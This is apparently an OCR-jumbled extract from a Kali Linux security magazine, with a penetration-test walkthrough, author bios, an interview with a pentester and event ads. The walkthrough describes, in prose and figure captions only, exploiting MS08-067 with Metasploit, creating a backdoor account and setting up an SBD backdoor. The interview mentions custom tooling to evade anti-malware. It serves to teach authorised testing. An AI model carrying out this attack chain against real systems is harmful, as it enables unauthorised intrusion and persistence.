domains such as nbc.ca, nbc.biz, etc.
TheHarvester can pull together a significant amount
of information that we can use during the scanning
phase of Discovery, but in this case we decide to uti-
lize some additional tools to further our Information
Figure 7. Fierce Example
Gathering efforts prior to moving on to scanning.
At this point we decide that we want to interro-
gate DNS a bit more with the information gathered
from TheHarvester. Because of its features we Figure 8. Fping Example
have choose to run our domains through Fierce.
Fierce can initiate DNS zone transfer attempts
as well perform bruteforce lookups against DNS.
While TheHarvester can perform DNS bruteforc-
ing as well, Fierce contains added functionality Figure 9. Hping3 Example
Attack
Gaining Access
Now that we have identified several vulnerabilities
as well as the likelihood of exploitation we decide to
try and exploit the MS08-067 vulnerability identified
Figure 11. NMAP Script Options with our nmap scan. We leverage the Metasploit
framework to begin our initial attack vector.
Metasploit is very powerful and could be used for
various phases within our methodology. That being
said Kali provides many options that can be lever-
aged to meet our testing objectives. In this particu-
Figure 12. NMAP Script Directory lar case Metasploit provides a perfect vehicle to
exploit this particular vulnerability.
Prior to launching Metasploit we need to startup
the Postgres database and the Metasploit server
component. These are not configured to startup on
boot by default in Kali (Figure 14).
Next, we launch Metasploit console with the ms-
fconsole command. After doing an initial search
we discover that Metasploit does have an exploit
for MS08-067. We configure the exploit with the
Figure 13. NMAP smb-check-vulns Output Against Target bind shell Meterpreter payload to make us work a
Host bit harder for our objectives. Once all the options
are configured we run the exploit using the exploit
command (Figure 15).
Success! We have exploited our vulnerability
and have gained access to our system.
a d v e r t i s e m e n t
EXTRA
Reporting allows us to take a screen capture of the victims
Documentation is critical to the success of the desktop. Here is a screenshot from our previously
penetration test. This can be performed through compromised host (Figure 24).
screen-shots or tool output. Since we are using Once this data is input or imported into Dradis we
Dradis we ensure that we output all tools to text or can output reports in HTML and Word documents.
XML files as well as take screen-shots where tool The screen-shot below should give you the idea
output is less efficient. (Figure 25).
Some tools provide self documenting features.
Take Metasploit for instance. It provides a data- Conclusion
base that captures output from various tools as Kali is a valuable resource when performing pen-
you progress through your penetration test. In ad- etration testing. Sometimes the tools can seem a
dition, Meterpreter has the screenshot feature that bit overwhelming. Leveraging a methodology such
as NIST 800-115 will bring some consistency and
continuity to your penetration tests.
While we did not cover every tool on the distribu-
Figure 20. Atftpd Startup on Kali For Tool Delivery tion nor demonstrate all mapped tools in our ex-
ample we hope this brief introduction will help you
formulate a plan of attack when using Kali on en-
gagements, so that you bring a better deliverable
to your clients.
Jeff Weekes
Jeff has over 15 years of IT and security services experience. He
currently performs penetration testing, web application secu-
Figure 21. Backdoor Account Creation on Target Host
rity assessment, security code review, security strategy, securi-
ty research, and incident / forensic / network forensic response
services for government contractors, financial institutions, re-
Figure 22. SBD Backdoor Setup On Target Host tail services, medical device manufacturers, contact centers,
cloud solution companies, and SaaS service companies.
Carlos Villalba
Carlos has over 17 years of solid IT. He has
Figure 23. SBD Kali Client Connection To Target Host extensive experience designing, develop-
ing, managing and implementing securi-
ty IT security solutions with its training and
security components in compliance with IT
Figure 24. Meterpreter Screenshot Example
security standards and best practices. Car-
loss experience provides and unique com-
bination of skills and experience. Carlos merged his experience
into the academic world by designing and delivering instruc-
tion and training at the graduate, undergraduate and profes-
sional level while being active IT security consultant. His expe-
rience includes Compliance Assessments, Pen-testing, IT secu-
rity projects, DIACAP Training Design, Oracle database perfor-
mance, Open Source Solutions for migration of Learning Man-
agement Systems and Database Management Systems. Ex-
pert knowledge level of windows based platforms and Red Hat
based systems. Solid experience with Active Directory, VPN,
SharePoint, Oracle RDBMS, MS SQL, web application security,
DNS, encryption, scripting, ISO17799 and PKI. He has provided
services to the Air Force Research Labs, Credit Unions, Universi-
Figure 25. Dradis Export Example ties, Manufacturing companies and small business.
Interview with
Jeff Weekes
Especially for you, we have interviewed a pentesting specialist
Jeff Weekes who has over 15 years of IT and security services
experience!
Kali is a superb tool for security experts Keeping tools updated can be a real challenge.
and pentesters. We would be interested to We decided long ago that the best method to en-
know how the tools are chosen and how sure consistent delivery is dedicated laptops for
theteam members work together to make assessments and penetration testing. Prior to an
the distro being updated? engagement we perform updates on the various
This is a great question! We often have to balance tools. Also, at the end of each engagement we se-
tool choices with functionality, cost, and resource curely delete the laptops, re-install baseline imag-
experience. After all we are inevitably in business es, and then update tools. In the near future we will
to make money. be rolling customized Kali images for our assess-
We like open-source tools as they provide a level ments. This will allow us to bake in our update rou-
of visibility into whats really happening. In addi- tines, leverage snapshots, and lastly minimize the
tion, it allows us to customize and script the tools need for additional hardware.
in a variety of ways. Most notably when it comes to
managing tool output for reporting. How are the comments of the users
In the end we leverage both open-source and treated by the team members who
commercial tools. Here is a quick run down of work on Kali when these users make
some of the tools we use in our war chest. suggestions or report bugs?
We take our clients feedback very seriously. In the
Kali -> Cant live without it!! event that we discover issues with what various
Nessus tools identify we immediately investigate the prob-
Qualys lem. Because many of the tools are open-source
Metaploit Community / Professional we can take a look at the underlying code. If we
Burpsuite identify the problem we attempt to notify the var-
Wireshark ious tool owners of through their bug reporting
channels. We will also update our team members
Customized scripts, shellcode, and commmand- so they are aware of the problem and can leverage
control applications to evade anti-malware con- different tools or techniques to ensure accuracy of
trols. our testing.
EXTRA 05/2013(16)
EXTRA
monitoring staff. Its a good idea to have a strat- Most of the people in my network have made the
egy on how to deal with data spill issues because switch to Kali and have nothing, but good things
they will eventually come up. We usually recom- to say.
mend data masking prior to log entry if the tech-
nology supports it or aggressive data scrubbing on Any idea on what can we expect from the
log files. Remember that the later may create log IT Security software developers? Are there
integrity issues as you have altered the logs. any gaps that need to be filled?
The second major issue is really understanding the Im excited to see where Dradis goes with there
application you are trying to protect. If you are not a SaaS based solution as well as the evolution of
web application developer you may need to become tools like MagicTree. I believe there is a real gap
one or at least understand how the application works around tools for reporting and data management.
at an in depth level. You also need to get the develop- Especially, with RedTeam engagements that in-
ment team involved early and often in the process to volve multiple penetration testers.
ensure successful buyin and deployment.
Do your friends, including IT specialists,
What are the most important steps he/ also have a positive opinion about Kali?
she would recommend for securing a web Most of the people in my network have made the
server or web application? switch to Kali and have nothing, but good things
The most important step in my mind is input vali- to say.
dation. I cant say it enough. Its critical that your
development teams understand the importance of Have you read our first issue of Kali Linux?
secure coding techniques and especially input val- Which of the methods described therein
idation. This can be a difficult challenge given most are you most interested in?
companies focus on application features and time I did read the first Kali issue. I have to say that I en-
to market. Web Application Firewalls can help, but joyed all the articles. My favorite was Kali Linux on
nothing beats securely developing the code in the a Raspberry Pi by Scott Cristie. Weve been look-
first place. Remember they dont and shouldnt re- ing at how we could deploy Kali on a small form
invent the wheel. There are some great frameworks factor for covert engagements and this article will
and libraries out there that can assist. Checkout give us a jump start on that endeavor.
several OWASP projects such as Enterprise Secu-
rity API (ESAPI) for additional details. What do you think about the future of
pentesting?
Does the platform produce potential I think penetration testing has a bright future. Tech-
threats? Do you have any precautions for nology is moving at an incredibly fast pace. Internet
the future users? enabled smartmeters, cars, and medical devices
Kali does produce some potential threats. Namely brings on new challenges and threats. If the past
around passwords and the potential services that is any indication then penetration test will be in de-
get enabled during the course of penetration test- mand. This shift in technology will require new skill-
ing. To limit both your and your clients exposure sets and techniques that penetration testers will
you should ensure the version/tools are updated, need to acquire in order to be successful. Im also
password protected (AKA Change the Default), excited about bug bounty programs coming from
and leverage a host firewall such as iptables. companies out of Silicon Valley as well as crowd-
In addition, we recommend encrypting the drive source initiatives from companies such as Synack.
where your artifacts reside as well as scrubbing There is some unique opportunity with these ini-
your penetration testing boxes or images after tiatives for freelance penetration testers to help
each engagement. You dont want to end up on strengthen the security postures of these compa-
the news for exposing your customers data. Es- nies and products while making some additional
pecially, data collected during the course of a pen- money.
etration test.
Over 60
of structured and unstructured data technologies with analysis and
how-to sses
business-analysis tools to produce
Process real-time data pouring into
l cla the kind of workable information
your organization
practicautorials and reports your organization needs
and t ose
Master Big Data tools and technologies
to ch o Understand HOW TO leverage Big Data
like Hadoop, Map/Reduce, NoSQL from! to help your organization today
databases, and more
p 1
ER a g ouc ou
4
OCTOBER 28-31, 2013
IA ss de r
L
Crashing the party -
digital services.
Enabling businesses and enterprises to conquer challenges and
seize opportunities presented by the digital world, Digital Disruption,
TM Forums all new, expanded event for the Americas, helps service
providers and their partners address vital issues such as reducing cost
and risk, improving market retention and growth and increasing revenue
by introducing innovative new services. Engage with 150+ expert speakers
over four days filled with critical insights, debate, TM Forum training, networking
and hands-on opportunities that immerse you in exciting innovations and new ideas.
Daniel Sieberg
Innovation Zone: Head of Media Outreach &
Explore all things TM Forum; meet companies that are Official Spokesperson, Google
seizing the opportunities the digital world is creating:
- Meet the experts, learn about TM Forum programs and Dr.Jrgen Meffert
explore our award-winning series of live Catalyst demos, Director (Senior Partner),
collaborative accelerator projects led by cutting edge service McKinsey & Company
providers and suppliers
- Touch and feel some of the latest disruptive technology Adrian Cockcroft
that is changing the way we live and work Director of Architecture, Cloud
Systems, Netflix
- Watch live demos and learn more about real digital services
that leverage the broad ecosystem
Georges Nahon
- Discover innovative technology from vendors CEO, Orange Silicon Valley
showcasing their best products and services
Vinay Vaidya, MD
Networking Vice President & Chief Medical
Information Officer,
Phoenix Childrens Hospital
TM Forum Training and MasterClasses